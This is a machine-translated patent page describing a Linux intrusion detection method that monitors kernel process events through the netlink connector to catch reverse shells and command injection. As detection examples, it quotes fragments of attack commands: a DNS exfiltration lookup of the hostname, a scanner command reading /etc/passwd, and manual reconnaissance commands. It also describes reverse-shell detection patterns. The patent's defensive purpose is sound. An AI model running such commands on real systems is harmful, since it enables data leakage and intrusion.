CN111651754B - Intrusion detection method and device, storage medium and electronic device - Google Patents
Intrusion detection method and device, storage medium and electronic device Download PDFInfo
- Publication number
- CN111651754B CN111651754B CN202010287480.XA CN202010287480A CN111651754B CN 111651754 B CN111651754 B CN 111651754B CN 202010287480 A CN202010287480 A CN 202010287480A CN 111651754 B CN111651754 B CN 111651754B
- Authority
- CN
- China
- Prior art keywords
- system kernel
- target
- event data
- communication connection
- target process
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
- 238000001514 detection method Methods 0.000 title claims abstract description 51
- 238000000034 method Methods 0.000 claims abstract description 295
- 230000008569 process Effects 0.000 claims abstract description 263
- 238000004891 communication Methods 0.000 claims abstract description 80
- 230000002159 abnormal effect Effects 0.000 claims abstract description 59
- 238000012544 monitoring process Methods 0.000 claims description 34
- 230000004044 response Effects 0.000 claims description 12
- 238000004590 computer program Methods 0.000 claims description 4
- 238000005516 engineering process Methods 0.000 abstract description 7
- 230000006870 function Effects 0.000 description 32
- 238000011161 development Methods 0.000 description 12
- 230000005540 biological transmission Effects 0.000 description 8
- 239000000243 solution Substances 0.000 description 8
- 230000006399 behavior Effects 0.000 description 6
- 238000003066 decision tree Methods 0.000 description 6
- 230000000694 effects Effects 0.000 description 5
- 238000010586 diagram Methods 0.000 description 4
- 238000002347 injection Methods 0.000 description 4
- 239000007924 injection Substances 0.000 description 4
- 239000003795 chemical substances by application Substances 0.000 description 3
- 230000006378 damage Effects 0.000 description 3
- 230000003287 optical effect Effects 0.000 description 3
- 238000012545 processing Methods 0.000 description 3
- 230000009471 action Effects 0.000 description 2
- 238000004458 analytical method Methods 0.000 description 2
- 230000008878 coupling Effects 0.000 description 2
- 238000010168 coupling process Methods 0.000 description 2
- 238000005859 coupling reaction Methods 0.000 description 2
- 238000001914 filtration Methods 0.000 description 2
- 230000009545 invasion Effects 0.000 description 2
- 230000007246 mechanism Effects 0.000 description 2
- 230000036316 preload Effects 0.000 description 2
- 208000018208 Hyperimmunoglobulinemia D with periodic fever Diseases 0.000 description 1
- 206010072219 Mevalonic aciduria Diseases 0.000 description 1
- 241000700605 Viruses Species 0.000 description 1
- 230000006978 adaptation Effects 0.000 description 1
- 238000010367 cloning Methods 0.000 description 1
- 238000005336 cracking Methods 0.000 description 1
- 238000007405 data analysis Methods 0.000 description 1
- 230000007123 defense Effects 0.000 description 1
- 238000012217 deletion Methods 0.000 description 1
- 230000037430 deletion Effects 0.000 description 1
- 238000013461 design Methods 0.000 description 1
- 238000007726 management method Methods 0.000 description 1
- 238000005065 mining Methods 0.000 description 1
- 238000010295 mobile communication Methods 0.000 description 1
- 238000012986 modification Methods 0.000 description 1
- 230000004048 modification Effects 0.000 description 1
- 230000035515 penetration Effects 0.000 description 1
- 230000008447 perception Effects 0.000 description 1
- 238000013468 resource allocation Methods 0.000 description 1
- 239000007787 solid Substances 0.000 description 1
- DTXLBRAVKYTGFE-UHFFFAOYSA-J tetrasodium;2-(1,2-dicarboxylatoethylamino)-3-hydroxybutanedioate Chemical compound [Na+].[Na+].[Na+].[Na+].[O-]C(=O)C(O)C(C([O-])=O)NC(C([O-])=O)CC([O-])=O DTXLBRAVKYTGFE-UHFFFAOYSA-J 0.000 description 1
- 238000012546 transfer Methods 0.000 description 1
- 238000012384 transportation and delivery Methods 0.000 description 1
- 239000013598 vector Substances 0.000 description 1
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/554—Detecting local intrusion or implementing counter-measures involving event detection and direct action
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements
- G06F21/566—Dynamic detection, i.e. detection performed at run-time, e.g. emulation, suspicious activities
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Software Systems (AREA)
- Theoretical Computer Science (AREA)
- Computer Hardware Design (AREA)
- General Engineering & Computer Science (AREA)
- General Physics & Mathematics (AREA)
- Physics & Mathematics (AREA)
- Virology (AREA)
- Health & Medical Sciences (AREA)
- General Health & Medical Sciences (AREA)
- Computer And Data Communications (AREA)
- Debugging And Monitoring (AREA)
Abstract
The application discloses an intrusion detection method and device, a storage medium and an electronic device. Wherein the method comprises the following steps: determining a target process in a system kernel, wherein the target process is an abnormal process generated by invading the system kernel to be confirmed; acquiring event data of a target process through communication connection, wherein the communication connection is the connection for communication with a system kernel, and the event data is data generated by an associated event of the target process; and determining whether the target process is an abnormal process according to the data characteristics of the event data. The application solves the technical problem of lower intrusion detection efficiency in the related technology.
Description
Technical Field
The present application relates to the field of internet, and in particular, to a method and apparatus for intrusion detection, a storage medium, and an electronic apparatus.
Background
With the rapid development of computer technology, information networks have become an important guarantee of social development. There are many sensitive information, even national secrets. It is inevitable to attract various man-made attacks (e.g., information leakage, information theft, data manipulation, data deletion, computer viruses, etc.) from around the world, wherein an intrusion attack is one of the most common network attacks.
An intrusion detection system (IntrusionDetectionSystem, abbreviated as "IDS") is a detection system that handles network attacks, and can monitor network transmissions in real time, and when suspicious network transmissions are found, alert or take proactive action network security devices. IDS is an important ring of the security protection system and also the last ring in the security deep defense system. When an attacker attacks the internal network to obtain the authority of the server, serious damage is often caused to a host owner through account operation, right raising operation, network configuration and file operation, including service interruption or complete destruction, data leakage or loss, continuous execution of operations irrelevant to services (such as sending DDOS attack data packets, mining and the like), and sometimes the server is kept back door. HIDS of Linux system is always the most basic and difficult problem to solve in the security field, and the main reasons include numerous versions, poor stability, serious performance loss and the like.
The existing intrusion detection scheme is mainly based on the mainstream open source project (for example OSSEC) for customized development, and the development scheme has the advantages of complex structure, large resource consumption, serious performance loss and low efficiency, and is difficult to realize detection of advanced threats in a user mode.
In view of the above problems, no effective solution has been proposed at present.
Disclosure of Invention
The embodiment of the application provides an intrusion detection method and device, a storage medium and an electronic device, which are used for at least solving the technical problem of low intrusion detection efficiency in the related technology.
According to an aspect of an embodiment of the present application, there is provided a method for detecting intrusion, including: determining a target process in a system kernel, wherein the target process is an abnormal process generated by invading the system kernel to be confirmed; acquiring event data of a target process through communication connection, wherein the communication connection is the connection for communication with a system kernel, and the event data is data generated by an associated event of the target process; and determining whether the target process is an abnormal process according to the data characteristics of the event data.
According to another aspect of the embodiment of the present application, there is also provided an intrusion detection apparatus, including: the determining unit is used for determining a target process in the system kernel, wherein the target process is an abnormal process generated by invading the system kernel to be confirmed or not; the system comprises an acquisition unit, a communication connection unit and a control unit, wherein the acquisition unit is used for acquiring event data of a target process through the communication connection, the communication connection is a connection for communication with a system kernel, and the event data is data generated by an associated event of the target process; and the detection unit is used for determining whether the target process is an abnormal process according to the data characteristics of the event data.
According to another aspect of the embodiments of the present application, there is also provided a storage medium including a stored program that executes the above-described method when running.
According to another aspect of the embodiments of the present application, there is also provided an electronic device including a memory, a processor, and a computer program stored on the memory and executable on the processor, the processor executing the method described above by the computer program.
In the embodiment of the application, determining whether the to-be-confirmed process in the system kernel is a target process of an abnormal process generated by invading the system kernel; the event data of the target process is acquired through the communication connection, and whether the target process is an abnormal process is further determined according to the data characteristics of the event data, in other words, whether the abnormal process exists or not can be directly monitored through the communication connection between the user state and the core state by adopting the technical scheme of the application, without customized development of an open source project, the time consumption and the resource consumption brought by the development scheme are avoided, the technical problem of lower intrusion detection efficiency in the related technology can be solved, and the technical effect of improving the detection efficiency is further achieved.
Drawings
The accompanying drawings, which are included to provide a further understanding of the application and are incorporated in and constitute a part of this specification, illustrate embodiments of the application and together with the description serve to explain the application and do not constitute a limitation on the application. In the drawings:
FIG. 1 is a flow chart of an alternative intrusion detection method according to an embodiment of the application;
FIG. 2 is a flow chart of an alternative intrusion detection method according to an embodiment of the application;
FIG. 3 is a flow chart of an alternative intrusion detection method according to an embodiment of the application;
FIG. 4 is a schematic diagram of an alternative intrusion detection device according to an embodiment of the application;
And
Fig. 5 is a block diagram of a structure of a terminal according to an embodiment of the present application.
Detailed Description
In order that those skilled in the art will better understand the present application, a technical solution in the embodiments of the present application will be clearly and completely described below with reference to the accompanying drawings in which it is apparent that the described embodiments are only some embodiments of the present application, not all embodiments. All other embodiments, which can be made by those skilled in the art based on the embodiments of the present application without making any inventive effort, shall fall within the scope of the present application.
It should be noted that the terms "first," "second," and the like in the description and the claims of the present application and the above figures are used for distinguishing between similar objects and not necessarily for describing a particular sequential or chronological order. It is to be understood that the data so used may be interchanged where appropriate such that the embodiments of the application described herein may be implemented in sequences other than those illustrated or otherwise described herein. Furthermore, the terms "comprises," "comprising," and "having," and any variations thereof, are intended to cover a non-exclusive inclusion, such that a process, method, system, article, or apparatus that comprises a list of steps or elements is not necessarily limited to those steps or elements expressly listed but may include other steps or elements not expressly listed or inherent to such process, method, article, or apparatus.
FIG. 1 is a flow chart of an alternative intrusion detection method according to an embodiment of the application, as shown in FIG. 1, the method may include the steps of:
Step S102, determining a target process of a system kernel (i.e. kernel state) in a user state, wherein the target process is an abnormal process generated by invading the system kernel to be confirmed.
In the memory protection of the processor, there are two main authority states, one is kernel state, also called privilege state, kernel state or pipe state, the kernel state is the mode operated by the kernel of the operating system, and the code operated in the mode can access the system memory and the external equipment without limitation; the other is a user state (i.e. eye state), which refers to a non-privileged state, in which the code executed by the user is defined by hardware and cannot perform certain operations, such as writing into the memory space of other processes, so as to prevent potential safety hazards to the operating system, and the kernel prohibits the code in this state from performing potentially dangerous operations, such as writing into a system configuration file, killing other user processes, restarting the system, etc.
The core of the computer is a CPU, which bears all processing tasks, and the operating system is a manager of the computer, which is responsible for task scheduling, resource allocation and management, and the whole computer hardware is collected; an application is a program that has some function and that runs on top of an operating system. The process is a process of dynamically executing a program with a certain independent function on a data set, is an independent unit for the operating system to allocate and schedule resources, and is a carrier for the application program to run.
The user state process is limited by the user state authority, generally, potential safety hazard is not caused, the process authority running in the core state is not limited, if the process is improperly operated, the whole computer is greatly damaged, and the target process in the application refers to the process in the core state.
Step S104, obtaining event data of the target process through communication connection in a user mode, wherein the communication connection is the connection for communication with the system kernel, and the event data is data generated by an associated event of the target process.
The communication connection (also referred to as a connector) is a communication connection between a user state and a kernel state, through which the user state can monitor process-related information in the kernel state, such as process events, event data, etc.
Step S106, determining whether the target process is an abnormal process according to the data characteristics of the event data in the user mode.
Through the steps, determining whether the to-be-confirmed process in the system kernel is a target process of an abnormal process generated by invading the system kernel; the event data of the target process is acquired through the communication connection, and whether the target process is an abnormal process is further determined according to the data characteristics of the event data, in other words, whether the abnormal process exists or not can be directly monitored through the communication connection between the user state and the core state by adopting the technical scheme of the application, without customized development of an open source project, the time consumption and the resource consumption brought by the development scheme are avoided, the technical problem of lower intrusion detection efficiency in the related technology can be solved, and the technical effect of improving the detection efficiency is further achieved.
In addition, the inventor recognizes through analysis of related technologies that core data of anti-intrusion detection in host security comprises three types of commands, networks and files, the files generate processes and the processes generate networks, so that most security events can be captured from the process point of view, the process events are the most important security perception data in anti-intrusion detection and are the basis of security detection and anomaly analysis, by adopting the technical scheme of the application based on the process events, whether weak password scanning or violent cracking actions are carried out before attack or rebound shell (a control end monitors a certain TCP/UDP port, a controlled end initiates a request to the port and transmits input and output of a command line to the control end), command execution injection (for the occasion of only needing to input data, malicious codes are input simultaneously along with the data, and a system for loading the data does not design a good filtering process, so that the malicious codes are executed together, and finally information leakage or normal data damage is caused); or a post gate or a hidden process can rely on basic data analysis of process events, and meanwhile, safety events can be analyzed in a multi-dimensional mode according to different attack vectors. The following further details the technical scheme of the present application in connection with the steps shown in fig. 1.
In the technical scheme provided in step S102, a target process in the system kernel is determined, where the target process is an abnormal process generated by invading the system kernel to be confirmed.
Optionally, before determining the target process in the system kernel, the communication connection between the monitoring application (such as a user-mode lightweight ncp application program in the Linux system) and the system kernel may be established in the following manner, so as to determine the target process in the system kernel through the monitoring application (the monitoring application is a user-mode application).
Step 1, a monitoring application sends first indication information to a system kernel, the first indication information is used for indicating the system kernel to establish a connector instance, the first indication information carries an instance identification ID of the connector instance, the connector instance is used for realizing communication connection between the monitoring application and the system kernel, the connector instance is an application instance in a kernel state, taking a connector instance Netlink Connector in a Linux system as an example, can send cn_add_callback (i.e. the first indication information) to the kernel, an interface function cn_add_callback is used for registering a new connector instance and a corresponding callback function with the connector (the callback function is a function called by a function pointer, if a pointer address of the function is passed to another function as a parameter, when the pointer is used for calling the function pointed by the function, the callback function is not directly called by an implementation party of the function, but is called by another party when a specific event or condition occurs, and is used for responding to the event or condition), and the callback function is designated by the parameter ID, and the callback function is represented by the callback function.
In step 2, in order to implement communication with the connector instance Netlink Connector, in the case that a first response message indicating that the establishment of the connection is successful is received by the system kernel, second indication information is sent to the system kernel, where the second indication information is used to instruct the system kernel to add an instance identifier to a target identifier set, where the identifier in the target identifier set is used to indicate an application in kernel mode that allows communication with an application in user mode, for example, in some kernels, the user mode application is not allowed to be sent to a Netlink group with a group number other than 1 (i.e., a group where the target identifier set is located) by default, so that the user mode application needs to add the established connector to the group first in order to use the group other than 1.
Step 3, in case of receiving a second response message of the system core indicating that the joining is successful, a communication connection between the monitoring application and the system core is established by means of the connector instance, for example, a message is sent to the connector instance in the specified group by means of the interface function cn_netlink_send.
In the above embodiment, the target process in the system kernel may be determined using the connector instance as follows:
Step 1, receiving a process creation message monitored by a connector instance in a system kernel, wherein the process creation message carries a process identifier of a process created in the system kernel.
And 2, taking the process represented by the process identifier as a target process.
In the technical scheme provided in step S104, event data of the target process is obtained through a communication connection, where the communication connection is a connection for performing communication with a system kernel, and the event data is data generated by an associated event of the target process.
Optionally, a monitoring application (such as ncp application) used in a user mode may be created in advance, so that when event data of a target process is acquired through a communication connection, the event data of the target process is acquired through calling the communication connection in the monitoring application.
In the technical scheme provided in step S106, whether the target process is an abnormal process is determined according to the data characteristics of the event data.
Alternatively, determining whether the target process is an abnormal process according to the data characteristics of the event data may be implemented as follows:
In step 1, in order to avoid identifying the behavior of some system security applications as an intrusion behavior, a white list (i.e., a target identifier set) may be pre-established, and a process identifier carried in a process creation message monitored by a system kernel is compared with identifiers in the target identifier set, where the identifiers in the target identifier set are process identifiers created by the application in the system kernel.
And step 2, under the condition that the identification matched with the process identification carried in the process creation message does not exist in the target identification set, determining whether the target process is an abnormal process according to the data characteristics of the event data after execution.
And3, under the condition that event data are detected to carry a first type of command (namely a high-risk command), determining that the target process belongs to a first type of abnormal process (namely a process generated by executing the high-risk command), wherein the first type of command is carried in data sent by a second terminal to a first terminal, the first terminal is a terminal where a system kernel is located, and the first type of abnormal process is created by executing the first type of command. The first type of commands can be divided into three types: no back display command, back display command and secondary penetration command.
And 4, under the condition that event data carry a second type of command (namely, a rebound shell) is detected, determining that the target process belongs to a second type of abnormal process (namely, an abnormal process caused by the rebound shell), wherein the second type of command is a command input in a target window of a second terminal, the target window is a control window of a first terminal, and the second type of abnormal process is created for executing the second type of command.
Optionally, after determining whether the target process is an abnormal process according to the data characteristics of the event data, displaying prompt information of whether the target process is an abnormal process in the monitoring application so as to prompt the user to adopt corresponding security measures.
As an optional embodiment, the technical solution of the present application is further described in detail by taking the application of the technical solution of the present application to a Linux system as an example.
In a Linux system, rebound shell and command injection are common means for invading a website server, how to effectively and timely discover the rebound shell and command injection is a difficult point, and since an Agent end (namely an Agent end) has no relevant discovery mechanism, hacker invasion behaviors cannot be timely discovered at the first time, in order to timely discover common hacker invasion behaviors, the application provides a rebound shell and command injection detection method based on a behavior calling chain.
The first method is that the kernel module hook (called hook function, before the system calls the function, the hook function captures the information first, at this time, the hook function can process the execution behavior of the function, and can force the transfer of the information), intercept the system call fork (the function creates a process almost identical to the original process through the system call, that is, two processes can do the same thing, but if the initial parameters or the input variables are different, two processes can do different thing, after one process calls the fork function, the system allocates resources for the new process, for example, the space for storing data and codes, then copies all values of the original process into the new process, only a few values are different from the values of the original process, which is equivalent to cloning one own), exec (the fork function is used for creating a sub-process, which is almost the copy of the process, and sometimes the user hopes to find out the other program by the other program according to the original program, the advantages and the default can be realized by the designating the program, and the other program can be replaced by the default file, and the default can be realized by the method when the program is called by the other program; the second method intercepts homonymous functions by means of preload mechanism (namely, using preload capability supported by the system to automatically inject modules into a process to realize hook), and has the advantages of light scheme, simple implementation and incapability of covering part of safety scenes.
The application also provides a third scheme for realizing process event data acquisition, as shown in fig. 2:
In step S201, netlink connector connections are established using cn_add_callback.
Process event auditing is implemented through a Linux connector, and an interface (such as an interface function cn_add_callback is used for registering a new connector instance and a corresponding callback function with the connector, an interface function cn_del_callback is used for uninstalling the callback function, and an interface function cn_netlink_send is used for sending a message to a given group) provided by a Linux kernel.
Step S202, a process connector switch is opened.
In step S203, a process event, such as proc_fork_ connector, proc _exec_ connector, proc _exit_connector, is received by cn_netlink_send.
In step S204, the event is parsed, and the user-state lightweight ncp application program is combined to realize safe and reliable parsing, so that the effect on the host is small, and more security scenes can be covered.
In step S205, the process data, such as the related information of the parent process, is complemented.
The flow for realizing intrusion detection by adopting the technical scheme of the application is shown in figure 3:
step S301, an attack sample is acquired.
In step S302, a decision tree is generated using the existing attack sample, and on the basis of the known occurrence probabilities of various situations, the probability that the expected value of the net present value is zero or more is obtained by constructing the decision tree, for example, the decision tree corresponding to the content in step S306 below.
In step S303, the agent in the user state (e.g. the above npc program) establishes a connection netlink between the kernel state and the user state through the netlink.
Step S304, the process creation message is obtained in real time by calling the cn_proc in the kernel mode through the netlink monitoring system, and the process creation message pid is received in real time through the netlink and is stored in a local message queue.
In step S305, meta information is acquired in an asynchronous acquisition manner, that is, a process call chain, such as a parent process, a process name, a process command line, a process directory, and an input/output redirection (i.e., a process io redirection), is acquired by using associated process information.
Step S306, obtaining process call chain information, such as parent process information and the like.
Step S307, extracting critical features of dangerous processes by analyzing common hacker execution commands to form decision trees, and determining whether the command is rebound shell or not by real-time association of the decision trees.
First, white list filtering is performed, and whether the application corresponding to the process is a white list application or not is judged through cwd associated with the process identification pid, such as application zabbix. If yes, stopping executing the following steps, otherwise, continuing executing the following steps.
Secondly, judging whether the command is executed for high-risk commands, wherein the following three common attack types are:
One is that the feedback is that the executing batch command and the executing result, such as the command "set id/etc/passwd" that the scanner automatically scans, can be displayed on the attacker host.
When the detection of the command with the echo of the scanner is executed, it can be judged whether the command with the echo of the scanner is executed.
And secondly, no echo command is displayed, or the batch command being executed, the executing result and the like are not displayed on the attacker host, and the command does not have echo information, such as the dns command executing "nslookup 'hostname' ceye.
Detection of the dns command may be performed by determining cmdline payload features, such as "nslookup 'hostname' dns".
Third, hackers manually penetrate attacks, such as the commands "whoami, pwd, ls.
When the detection of the hacker manual command is executed, a set of common commands of the hacker can be stored in advance, and when judging whether a certain command is the hacker manual command, the command can be compared with the commands in the set so as to finish the judgment.
For the three types of commands, the judgment can be sequentially carried out, and in order to improve the judgment accuracy, the commands with high recognition accuracy in practice can be put forward and put backward easily and mistakenly.
And thirdly, judging whether the shell is a rebound shell or not. The rebound shell detection method comprises the following two common modes:
One is to perform sub-flash (or sub-shell) redirection detection (i.e. judging whether there is redirection in input and output), and the false alarm probability of the scheme is very low.
Second, command line payload (i.e., the manner in which the command line is injected) detection is performed.
Considering that the false alarm probability of judging whether the sub-flash is redirected is extremely low, but the possibility of missing the alarm exists, the common cheatsheet missing alarm rate is low when judging whether the payload is a rebound shell, but the false alarm condition exists. Therefore, the combination of the two can reduce the rate of missing report and the rate of false report, thereby improving the detection accuracy.
In this embodiment, it is first determined whether the command line has a payload feature, and if the command line has a payload feature, then the parent process is determined and the network connection is acquired. Judging whether the parent process is a Web container or not in the parent process judgment, then judging whether the network connection has an IP or not, and then determining the abnormal type according to different combinations of the network connection conditions of the parent process and the IP. For example, if the father process is a Web container and the network connection is intranet IP, then the explanation is a rebound shell of intranet IP; the father process is a Web container, the network connection is an external network IP, and the explanation is a reverse shell of the external network IP.
Step S308, if the shell is a rebound shell or command is injected, alarm delivery is performed.
Step S309, the operator checks whether the alarm is correct after receiving the alarm, and if not, the operator corrects the alarm.
By adopting the technical scheme of the application, the process creation message can be obtained in real time by calling cn_proc through a netlink monitoring system; acquiring a process call chain, a father process, a process name, a process command line, a process directory and input/output redirection by utilizing associated process information; and extracting critical characteristics of the dangerous process by analyzing a common hacker execution command to form a decision tree.
It should be noted that, for simplicity of description, the foregoing method embodiments are all described as a series of acts, but it should be understood by those skilled in the art that the present application is not limited by the order of acts described, as some steps may be performed in other orders or concurrently in accordance with the present application. Further, those skilled in the art will also appreciate that the embodiments described in the specification are all preferred embodiments, and that the acts and modules referred to are not necessarily required for the present application.
From the description of the above embodiments, it will be clear to a person skilled in the art that the method according to the above embodiments may be implemented by means of software plus the necessary general hardware platform, but of course also by means of hardware, but in many cases the former is a preferred embodiment. Based on such understanding, the technical solution of the present application may be embodied essentially or in a part contributing to the prior art in the form of a software product stored in a storage medium (e.g. ROM/RAM, magnetic disk, optical disk) comprising instructions for causing a terminal device (which may be a mobile phone, a computer, a server, or a network device, etc.) to perform the method according to the embodiments of the present application.
According to another aspect of the embodiment of the present application, there is also provided an intrusion detection apparatus for implementing the intrusion detection method described above. FIG. 4 is a schematic diagram of an alternative intrusion detection device according to an embodiment of the application, as shown in FIG. 4, which may include:
The determining unit 401 is configured to determine a target process in the system kernel, where the target process is an abnormal process generated by invading the system kernel to be confirmed.
And an obtaining unit 403, configured to obtain event data of the target process through a communication connection, where the communication connection is a connection for performing communication with a system kernel, and the event data is data generated by an associated event of the target process.
And the detection unit 405 is configured to determine whether the target process is an abnormal process according to the data characteristics of the event data.
It should be noted that the determining unit 401 in this embodiment may be used to perform step S102 in the embodiment of the present application, the acquiring unit 403 in this embodiment may be used to perform step S104 in the embodiment of the present application, and the detecting unit 405 in this embodiment may be used to perform step S106 in the embodiment of the present application.
It should be noted that the above modules are the same as examples and application scenarios implemented by the corresponding steps, but are not limited to what is disclosed in the above embodiments. It should be noted that, the above modules may be implemented in software or hardware as a part of the apparatus and may be operated in a corresponding hardware environment.
Determining whether the to-be-confirmed process in the system kernel is a target process of an abnormal process generated by invading the system kernel through the module; the event data of the target process is acquired through the communication connection, and whether the target process is an abnormal process is further determined according to the data characteristics of the event data, in other words, whether the abnormal process exists or not can be directly monitored through the communication connection between the user state and the core state by adopting the technical scheme of the application, without customized development of an open source project, the time consumption and the resource consumption brought by the development scheme are avoided, the technical problem of lower intrusion detection efficiency in the related technology can be solved, and the technical effect of improving the detection efficiency is further achieved.
Optionally, the apparatus of the present application may further comprise: the communication establishing unit is used for establishing communication connection between the monitoring application and the system kernel before the event data of the target process is acquired through communication connection, wherein the monitoring application is a user-state application; the acquisition unit may be further configured to: in a monitoring application, event data of a target process is acquired by invoking a communication connection.
Optionally, the above communication establishing unit may further be configured to: the method comprises the steps of sending first indication information to a system kernel, wherein the first indication information is used for indicating the system kernel to establish a connector instance, the first indication information carries an instance identifier of the connector instance, the connector instance is used for realizing communication connection between a monitoring application and the system kernel, and the connector instance is an application instance in a kernel state; under the condition that a first response message of the system kernel representing that the establishment is successful is received, second indication information is sent to the system kernel, wherein the second indication information is used for indicating the system kernel to add an instance identifier into a target identifier set, and the identifier in the target identifier set is used for representing an application in a kernel mode which allows communication with the application in a user mode; in the event that a second response message is received by the system kernel indicating that the joining was successful, a communication connection between the monitoring application and the system kernel is established using the connector instance.
Optionally, the apparatus of the present application may further comprise: and the prompt unit is used for displaying prompt information of whether the target process is an abnormal process in the monitoring application after determining whether the target process is the abnormal process according to the data characteristics of the event data.
Optionally, the above determining unit may further be configured to: receiving a process creation message monitored by a connector instance in a system kernel, wherein the process creation message carries a process identifier of a process created in the system kernel; and taking the process represented by the process identifier as a target process.
Optionally, the above detection unit may further be configured to: under the condition that event data are detected to carry first type commands, determining that a target process belongs to a first type abnormal process, wherein the first type commands are carried in data sent to a first terminal by a second terminal, the first terminal is a terminal where a system kernel is located, and the first type abnormal process is created for executing the first type commands; and/or under the condition that the event data carries a second type of command, determining that the target process belongs to a second type of abnormal process, wherein the second type of command is a command input in a target window of a second terminal, the target window is a control window of the first terminal, and the second type of abnormal process is created for executing the second type of command.
Optionally, the above detection unit may further be configured to: before determining whether the target process is an abnormal process according to the data characteristics of the event data, comparing a process identifier carried in a process creation message monitored by a system kernel with identifiers in a target identifier set, wherein the identifiers in the target identifier set are process identifiers created by an application in the system kernel; and under the condition that the target identifier set does not have identifiers matched with the process identifiers carried in the process creation message, determining whether the target process is an abnormal process according to the data characteristics of the event data.
It should be noted that the above modules are the same as examples and application scenarios implemented by the corresponding steps, but are not limited to what is disclosed in the above embodiments. It should be noted that, the above modules may be implemented in a corresponding hardware environment as part of the apparatus, and may be implemented in software, or may be implemented in hardware, where the hardware environment includes a network environment.
According to another aspect of the embodiment of the present application, there is also provided a server or a terminal for implementing the intrusion detection method.
Fig. 5 is a block diagram of a terminal according to an embodiment of the present application, and as shown in fig. 5, the terminal may include: one or more (only one is shown in fig. 5) processors 501, memory 503, and transmission means 505, as shown in fig. 5, the terminal may further comprise input output devices 507.
The memory 503 may be used to store software programs and modules, such as program instructions/modules corresponding to the intrusion detection method and apparatus in the embodiment of the present application, and the processor 501 executes the software programs and modules stored in the memory 503, thereby performing various functional applications and data processing, that is, implementing the intrusion detection method described above. Memory 503 may include high speed random access memory, and may also include non-volatile memory, such as one or more magnetic storage devices, flash memory, or other non-volatile solid state memory. In some examples, the memory 503 may further include memory located remotely from the processor 501, which may be connected to the terminal via a network. Examples of such networks include, but are not limited to, the internet, intranets, local area networks, mobile communication networks, and combinations thereof.
The transmission device 505 is used for receiving or transmitting data via a network, and may also be used for data transmission between the processor and the memory. Specific examples of the network described above may include wired networks and wireless networks. In one example, the transmission device 505 includes a network adapter (Network Interface Controller, NIC) that may be connected to other network devices and routers via a network cable to communicate with the internet or a local area network. In one example, the transmission device 505 is a Radio Frequency (RF) module, which is used to communicate with the internet wirelessly.
Wherein in particular the memory 503 is used for storing application programs.
The processor 501 may call an application stored in the memory 503 via the transmission means 505 to perform the following steps:
Determining a target process in a system kernel, wherein the target process is an abnormal process generated by invading the system kernel to be confirmed;
acquiring event data of a target process through communication connection, wherein the communication connection is the connection for communication with a system kernel, and the event data is data generated by an associated event of the target process;
and determining whether the target process is an abnormal process according to the data characteristics of the event data.
The processor 501 is further configured to perform the steps of:
the method comprises the steps of sending first indication information to a system kernel, wherein the first indication information is used for indicating the system kernel to establish a connector instance, the first indication information carries an instance identifier of the connector instance, the connector instance is used for realizing communication connection between a monitoring application and the system kernel, and the connector instance is an application instance in a kernel state;
Under the condition that a first response message of the system kernel representing that the establishment is successful is received, second indication information is sent to the system kernel, wherein the second indication information is used for indicating the system kernel to add an instance identifier into a target identifier set, and the identifier in the target identifier set is used for representing an application in a kernel mode which allows communication with the application in a user mode;
In the event that a second response message is received by the system kernel indicating that the joining was successful, a communication connection between the monitoring application and the system kernel is established using the connector instance.
By adopting the embodiment of the application, a 'determining a target process in a system kernel' is provided, wherein the target process is an abnormal process generated by whether the target process is an intrusion system kernel or not to be confirmed; acquiring event data of a target process through communication connection, wherein the communication connection is the connection for communication with a system kernel, and the event data is data generated by an associated event of the target process; according to the scheme of determining whether the target process is an abnormal process according to the data characteristics of the event data, the technical scheme of the application can be used for monitoring whether the abnormal process exists directly through the communication connection between the user state and the core state, without customized development of an open source project, so that the time consumption and the resource consumption brought by the development scheme are avoided, the technical problem of lower intrusion detection efficiency in the related art can be solved, and the technical effect of improving the detection efficiency is further achieved.
Alternatively, specific examples in this embodiment may refer to examples described in the foregoing embodiments, and this embodiment is not described herein.
It will be appreciated by those skilled in the art that the structure shown in fig. 5 is only illustrative, and the terminal may be a smart phone (such as an Android phone, an iOS phone, etc.), a tablet computer, a palm computer, a Mobile internet device (Mobile INTERNET DEVICES, MID), a PAD, etc. Fig. 5 is not limited to the structure of the electronic device. For example, the terminal may also include more or fewer components (e.g., network interfaces, display devices, etc.) than shown in fig. 5, or have a different configuration than shown in fig. 5.
Those of ordinary skill in the art will appreciate that all or part of the steps in the various methods of the above embodiments may be implemented by a program for instructing a terminal device to execute in association with hardware, the program may be stored in a computer readable storage medium, and the storage medium may include: flash disk, read-Only Memory (ROM), random-access Memory (Random Access Memory, RAM), magnetic disk or optical disk, etc.
The embodiment of the application also provides a storage medium. Alternatively, in the present embodiment, the storage medium described above may be used for executing the program code of the intrusion detection method.
Alternatively, in this embodiment, the storage medium may be located on at least one network device of the plurality of network devices in the network shown in the above embodiment.
Alternatively, in the present embodiment, the storage medium is configured to store program code for performing the steps of:
Determining a target process in a system kernel, wherein the target process is an abnormal process generated by invading the system kernel to be confirmed;
acquiring event data of a target process through communication connection, wherein the communication connection is the connection for communication with a system kernel, and the event data is data generated by an associated event of the target process;
and determining whether the target process is an abnormal process according to the data characteristics of the event data.
Optionally, the storage medium is further arranged to store program code for performing the steps of:
the method comprises the steps of sending first indication information to a system kernel, wherein the first indication information is used for indicating the system kernel to establish a connector instance, the first indication information carries an instance identifier of the connector instance, the connector instance is used for realizing communication connection between a monitoring application and the system kernel, and the connector instance is an application instance in a kernel state;
